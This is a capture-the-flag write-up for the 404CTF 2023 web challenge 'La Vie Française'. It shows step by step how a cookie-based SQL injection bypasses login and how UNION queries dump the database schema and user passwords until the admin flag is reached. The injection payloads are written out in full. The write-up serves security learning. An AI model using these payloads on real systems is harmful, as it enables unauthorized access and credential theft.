Home CTFs | 404CTF_2023 | Web | La Vie Française
Post
Cancel

CTFs | 404CTF_2023 | Web | La Vie Française

La Vie Française

image

When we arrive in this challenge, we access a web page where we can create an account by clicking on Postuler:

image

Because I am someone really original, I created the user a with the password… a. We then can connect using this account and we arrive to the account page:

image

At first I tried some SQLi on the previous forms without luck. I noticed that we have a uuid cookie and start looking about this on the web. Still nothing. I remembered of a challenge on WebGoat that used SQLi on cookies and when I tried XXX' OR True -- - I was now connected as jacquesrival:

image

I tried using the XXX' OR True ORDER BY 3 -- - command to access user madeleineforestier that have administrator right, but even connected with this technique to this admin user this wasn’t enough. I tried a basic UNION based attack to recover information in the database and found that there was 3 columns using the command XXX' UNION Select '1','2',3 -- -:

image

Note that only the param 1 and 2 are displayed so no need to set the value of the third parameter

We can now use the command XXX' UNION Select '1',group_concat(0x7c,schema_name,0x7c),3 from information_schema.schemata -- - to dump all the databases:

image

We can see that the database we are looking for is named usersdb. We can now run the command XXX' UNION select group_concat(0x7c,TABLE_NAME,0x7c),group_concat(0x7c,TABLE_SCHEMA,0x7c),3 from INFORMATION_SCHEMA.TABLES where table_schema='usersdb'-- - to dump the tables:

image

As we can see, for the database usersdb, there is only one table called users. We can now list all the column name of this table using the command XXX' UNION select group_concat(0x7c,COLUMN_NAME,0x7c),group_concat(0x7c,TABLE_NAME,0x7c),3 from INFORMATION_SCHEMA.COLUMNS where table_name='users' -- -:

image

We can see that there is the username and password attribute that we may want to dump using the command XXX' UNION select group_concat(0x7c,username,0x7c),group_concat(0x7c,password,0x7c),3 from users -- -:

image

We see a list of password… We can try connecting to the madeleineforestier account using the password fo2DVkgShz2pPJ and now when we go to the admin panel:

image

We get the flag: 404CTF{B3w4Re_th3_d3STruct1v3s_Qu0tes}

This post is licensed under CC BY 4.0 by the author.